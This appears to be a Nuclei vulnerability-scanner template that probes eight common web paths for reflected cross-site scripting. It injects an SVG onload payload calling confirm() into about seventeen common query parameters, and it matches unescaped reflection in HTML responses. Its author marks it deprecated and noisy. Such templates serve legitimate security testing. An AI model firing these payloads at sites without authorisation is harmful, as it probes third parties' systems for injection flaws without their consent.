# id contains the unique identifier for the template.
id: xss-fuzz

info:
  # Name is the name of the template
  name: Top 15 XSS Check
  author: esetal
  # Severity is the severity for the template.
  severity: medium
  #  Description optionally describes the template.
  description: deprecated template with a lot of false positives,  i do not recommend to use this one in 2022=)
  tags: xss

requests:
  - method: GET
    path:
      - "{{BaseURL}}/?q=%27%3E%22%3Csvg%2Fonload=confirm%28%27testing-xss1%27%29%3E&s=%27%3E%22%3Csvg%2Fonload=confirm%28%27testing-xss2%27%29%3E&search=%27%3E%22%3Csvg%2Fonload=confirm%28%27testing-xss3%27%29%3E&id=%27%3E%22%3Csvg%2Fonload=confirm%28%27testing-xss4%27%29%3E&action=%27%3E%22%3Csvg%2Fonload=confirm%28%27testing-xss5%27%29%3E&keyword=%27%3E%22%3Csvg%2Fonload=confirm%28%27testing-xss6%27%29%3E&query=%27%3E%22%3Csvg%2Fonload=confirm%28%27testing-xss7%27%29%3E&page=%27%3E%22%3Csvg%2Fonload=confirm%28%27testing-xss8%27%29%3E&keywords=%27%3E%22%3Csvg%2Fonload=confirm%28%27testing-xss9%27%29%3E&url=%27%3E%22%3Csvg%2Fonload=confirm%28%27testing-xss10%27%29%3E&view=%27%3E%22%3Csvg%2Fonload=confirm%28%27testing-xss11%27%29%3E&cat=%27%3E%22%3Csvg%2Fonload=confirm%28%27testing-xss12%27%29%3E&name=%27%3E%22%3Csvg%2Fonload=confirm%28%27testing-xss13%27%29%3E&key=%27%3E%22%3Csvg%2Fonload=confirm%28%27testing-xss14%27%29%3E&p=%27%3E%22%3Csvg%2Fonload=confirm%28%27testing-xss15%27%29%3E&redirect_uri=%27%3E%22%3Csvg%2Fonload=confirm%28%27testing-xss15%27%29%3E&redirect_url=%27%3E%22%3Csvg%2Fonload=confirm%28%27testing-xss15%27%29%3E"
      - "{{BaseURL}}/admin?q=%27%3E%22%3Csvg%2Fonload=confirm%28%27testing-xss1%27%29%3E&s=%27%3E%22%3Csvg%2Fonload=confirm%28%27testing-xss2%27%29%3E&search=%27%3E%22%3Csvg%2Fonload=confirm%28%27testing-xss3%27%29%3E&id=%27%3E%22%3Csvg%2Fonload=confirm%28%27testing-xss4%27%29%3E&action=%27%3E%22%3Csvg%2Fonload=confirm%28%27testing-xss5%27%29%3E&keyword=%27%3E%22%3Csvg%2Fonload=confirm%28%27testing-xss6%27%29%3E&query=%27%3E%22%3Csvg%2Fonload=confirm%28%27testing-xss7%27%29%3E&page=%27%3E%22%3Csvg%2Fonload=confirm%28%27testing-xss8%27%29%3E&keywords=%27%3E%22%3Csvg%2Fonload=confirm%28%27testing-xss9%27%29%3E&url=%27%3E%22%3Csvg%2Fonload=confirm%28%27testing-xss10%27%29%3E&view=%27%3E%22%3Csvg%2Fonload=confirm%28%27testing-xss11%27%29%3E&cat=%27%3E%22%3Csvg%2Fonload=confirm%28%27testing-xss12%27%29%3E&name=%27%3E%22%3Csvg%2Fonload=confirm%28%27testing-xss13%27%29%3E&key=%27%3E%22%3Csvg%2Fonload=confirm%28%27testing-xss14%27%29%3E&p=%27%3E%22%3Csvg%2Fonload=confirm%28%27testing-xss15%27%29%3E&redirect_uri=%27%3E%22%3Csvg%2Fonload=confirm%28%27testing-xss15%27%29%3E&redirect_url=%27%3E%22%3Csvg%2Fonload=confirm%28%27testing-xss15%27%29%3E"
      - "{{BaseURL}}/logout?q=%27%3E%22%3Csvg%2Fonload=confirm%28%27testing-xss1%27%29%3E&s=%27%3E%22%3Csvg%2Fonload=confirm%28%27testing-xss2%27%29%3E&search=%27%3E%22%3Csvg%2Fonload=confirm%28%27testing-xss3%27%29%3E&id=%27%3E%22%3Csvg%2Fonload=confirm%28%27testing-xss4%27%29%3E&action=%27%3E%22%3Csvg%2Fonload=confirm%28%27testing-xss5%27%29%3E&keyword=%27%3E%22%3Csvg%2Fonload=confirm%28%27testing-xss6%27%29%3E&query=%27%3E%22%3Csvg%2Fonload=confirm%28%27testing-xss7%27%29%3E&page=%27%3E%22%3Csvg%2Fonload=confirm%28%27testing-xss8%27%29%3E&keywords=%27%3E%22%3Csvg%2Fonload=confirm%28%27testing-xss9%27%29%3E&url=%27%3E%22%3Csvg%2Fonload=confirm%28%27testing-xss10%27%29%3E&view=%27%3E%22%3Csvg%2Fonload=confirm%28%27testing-xss11%27%29%3E&cat=%27%3E%22%3Csvg%2Fonload=confirm%28%27testing-xss12%27%29%3E&name=%27%3E%22%3Csvg%2Fonload=confirm%28%27testing-xss13%27%29%3E&key=%27%3E%22%3Csvg%2Fonload=confirm%28%27testing-xss14%27%29%3E&p=%27%3E%22%3Csvg%2Fonload=confirm%28%27testing-xss15%27%29%3E&redirect_uri=%27%3E%22%3Csvg%2Fonload=confirm%28%27testing-xss15%27%29%3E&redirect_url=%27%3E%22%3Csvg%2Fonload=confirm%28%27testing-xss15%27%29%3E"
      - "{{BaseURL}}/search?q=%27%3E%22%3Csvg%2Fonload=confirm%28%27testing-xss1%27%29%3E&s=%27%3E%22%3Csvg%2Fonload=confirm%28%27testing-xss2%27%29%3E&search=%27%3E%22%3Csvg%2Fonload=confirm%28%27testing-xss3%27%29%3E&id=%27%3E%22%3Csvg%2Fonload=confirm%28%27testing-xss4%27%29%3E&action=%27%3E%22%3Csvg%2Fonload=confirm%28%27testing-xss5%27%29%3E&keyword=%27%3E%22%3Csvg%2Fonload=confirm%28%27testing-xss6%27%29%3E&query=%27%3E%22%3Csvg%2Fonload=confirm%28%27testing-xss7%27%29%3E&page=%27%3E%22%3Csvg%2Fonload=confirm%28%27testing-xss8%27%29%3E&keywords=%27%3E%22%3Csvg%2Fonload=confirm%28%27testing-xss9%27%29%3E&url=%27%3E%22%3Csvg%2Fonload=confirm%28%27testing-xss10%27%29%3E&view=%27%3E%22%3Csvg%2Fonload=confirm%28%27testing-xss11%27%29%3E&cat=%27%3E%22%3Csvg%2Fonload=confirm%28%27testing-xss12%27%29%3E&name=%27%3E%22%3Csvg%2Fonload=confirm%28%27testing-xss13%27%29%3E&key=%27%3E%22%3Csvg%2Fonload=confirm%28%27testing-xss14%27%29%3E&p=%27%3E%22%3Csvg%2Fonload=confirm%28%27testing-xss15%27%29%3E&redirect_uri=%27%3E%22%3Csvg%2Fonload=confirm%28%27testing-xss15%27%29%3E&redirect_url=%27%3E%22%3Csvg%2Fonload=confirm%28%27testing-xss15%27%29%3E"
      - "{{BaseURL}}/news?q=%27%3E%22%3Csvg%2Fonload=confirm%28%27testing-xss1%27%29%3E&s=%27%3E%22%3Csvg%2Fonload=confirm%28%27testing-xss2%27%29%3E&search=%27%3E%22%3Csvg%2Fonload=confirm%28%27testing-xss3%27%29%3E&id=%27%3E%22%3Csvg%2Fonload=confirm%28%27testing-xss4%27%29%3E&action=%27%3E%22%3Csvg%2Fonload=confirm%28%27testing-xss5%27%29%3E&keyword=%27%3E%22%3Csvg%2Fonload=confirm%28%27testing-xss6%27%29%3E&query=%27%3E%22%3Csvg%2Fonload=confirm%28%27testing-xss7%27%29%3E&page=%27%3E%22%3Csvg%2Fonload=confirm%28%27testing-xss8%27%29%3E&keywords=%27%3E%22%3Csvg%2Fonload=confirm%28%27testing-xss9%27%29%3E&url=%27%3E%22%3Csvg%2Fonload=confirm%28%27testing-xss10%27%29%3E&view=%27%3E%22%3Csvg%2Fonload=confirm%28%27testing-xss11%27%29%3E&cat=%27%3E%22%3Csvg%2Fonload=confirm%28%27testing-xss12%27%29%3E&name=%27%3E%22%3Csvg%2Fonload=confirm%28%27testing-xss13%27%29%3E&key=%27%3E%22%3Csvg%2Fonload=confirm%28%27testing-xss14%27%29%3E&p=%27%3E%22%3Csvg%2Fonload=confirm%28%27testing-xss15%27%29%3E&redirect_uri=%27%3E%22%3Csvg%2Fonload=confirm%28%27testing-xss15%27%29%3E&redirect_url=%27%3E%22%3Csvg%2Fonload=confirm%28%27testing-xss15%27%29%3E"
      - "{{BaseURL}}/login?q=%27%3E%22%3Csvg%2Fonload=confirm%28%27testing-xss1%27%29%3E&s=%27%3E%22%3Csvg%2Fonload=confirm%28%27testing-xss2%27%29%3E&search=%27%3E%22%3Csvg%2Fonload=confirm%28%27testing-xss3%27%29%3E&id=%27%3E%22%3Csvg%2Fonload=confirm%28%27testing-xss4%27%29%3E&action=%27%3E%22%3Csvg%2Fonload=confirm%28%27testing-xss5%27%29%3E&keyword=%27%3E%22%3Csvg%2Fonload=confirm%28%27testing-xss6%27%29%3E&query=%27%3E%22%3Csvg%2Fonload=confirm%28%27testing-xss7%27%29%3E&page=%27%3E%22%3Csvg%2Fonload=confirm%28%27testing-xss8%27%29%3E&keywords=%27%3E%22%3Csvg%2Fonload=confirm%28%27testing-xss9%27%29%3E&url=%27%3E%22%3Csvg%2Fonload=confirm%28%27testing-xss10%27%29%3E&view=%27%3E%22%3Csvg%2Fonload=confirm%28%27testing-xss11%27%29%3E&cat=%27%3E%22%3Csvg%2Fonload=confirm%28%27testing-xss12%27%29%3E&name=%27%3E%22%3Csvg%2Fonload=confirm%28%27testing-xss13%27%29%3E&key=%27%3E%22%3Csvg%2Fonload=confirm%28%27testing-xss14%27%29%3E&p=%27%3E%22%3Csvg%2Fonload=confirm%28%27testing-xss15%27%29%3E&redirect_uri=%27%3E%22%3Csvg%2Fonload=confirm%28%27testing-xss15%27%29%3E&redirect_url=%27%3E%22%3Csvg%2Fonload=confirm%28%27testing-xss15%27%29%3E"
      - "{{BaseURL}}/register?q=%27%3E%22%3Csvg%2Fonload=confirm%28%27testing-xss1%27%29%3E&s=%27%3E%22%3Csvg%2Fonload=confirm%28%27testing-xss2%27%29%3E&search=%27%3E%22%3Csvg%2Fonload=confirm%28%27testing-xss3%27%29%3E&id=%27%3E%22%3Csvg%2Fonload=confirm%28%27testing-xss4%27%29%3E&action=%27%3E%22%3Csvg%2Fonload=confirm%28%27testing-xss5%27%29%3E&keyword=%27%3E%22%3Csvg%2Fonload=confirm%28%27testing-xss6%27%29%3E&query=%27%3E%22%3Csvg%2Fonload=confirm%28%27testing-xss7%27%29%3E&page=%27%3E%22%3Csvg%2Fonload=confirm%28%27testing-xss8%27%29%3E&keywords=%27%3E%22%3Csvg%2Fonload=confirm%28%27testing-xss9%27%29%3E&url=%27%3E%22%3Csvg%2Fonload=confirm%28%27testing-xss10%27%29%3E&view=%27%3E%22%3Csvg%2Fonload=confirm%28%27testing-xss11%27%29%3E&cat=%27%3E%22%3Csvg%2Fonload=confirm%28%27testing-xss12%27%29%3E&name=%27%3E%22%3Csvg%2Fonload=confirm%28%27testing-xss13%27%29%3E&key=%27%3E%22%3Csvg%2Fonload=confirm%28%27testing-xss14%27%29%3E&p=%27%3E%22%3Csvg%2Fonload=confirm%28%27testing-xss15%27%29%3E&redirect_uri=%27%3E%22%3Csvg%2Fonload=confirm%28%27testing-xss15%27%29%3E&redirect_url=%27%3E%22%3Csvg%2Fonload=confirm%28%27testing-xss15%27%29%3E"
      - "{{BaseURL}}/profile?q=%27%3E%22%3Csvg%2Fonload=confirm%28%27testing-xss1%27%29%3E&s=%27%3E%22%3Csvg%2Fonload=confirm%28%27testing-xss2%27%29%3E&search=%27%3E%22%3Csvg%2Fonload=confirm%28%27testing-xss3%27%29%3E&id=%27%3E%22%3Csvg%2Fonload=confirm%28%27testing-xss4%27%29%3E&action=%27%3E%22%3Csvg%2Fonload=confirm%28%27testing-xss5%27%29%3E&keyword=%27%3E%22%3Csvg%2Fonload=confirm%28%27testing-xss6%27%29%3E&query=%27%3E%22%3Csvg%2Fonload=confirm%28%27testing-xss7%27%29%3E&page=%27%3E%22%3Csvg%2Fonload=confirm%28%27testing-xss8%27%29%3E&keywords=%27%3E%22%3Csvg%2Fonload=confirm%28%27testing-xss9%27%29%3E&url=%27%3E%22%3Csvg%2Fonload=confirm%28%27testing-xss10%27%29%3E&view=%27%3E%22%3Csvg%2Fonload=confirm%28%27testing-xss11%27%29%3E&cat=%27%3E%22%3Csvg%2Fonload=confirm%28%27testing-xss12%27%29%3E&name=%27%3E%22%3Csvg%2Fonload=confirm%28%27testing-xss13%27%29%3E&key=%27%3E%22%3Csvg%2Fonload=confirm%28%27testing-xss14%27%29%3E&p=%27%3E%22%3Csvg%2Fonload=confirm%28%27testing-xss15%27%29%3E&redirect_uri=%27%3E%22%3Csvg%2Fonload=confirm%28%27testing-xss15%27%29%3E&redirect_url=%27%3E%22%3Csvg%2Fonload=confirm%28%27testing-xss15%27%29%3E"
    redirects: false
    matchers-condition: and
    matchers:
      - type: word
        words:
          - "<svg/onload=confirm('testing-xss"
        part: body

      - type: word
        words:
          - "text/html"
        part: header

      - type: status
        status:
          - 200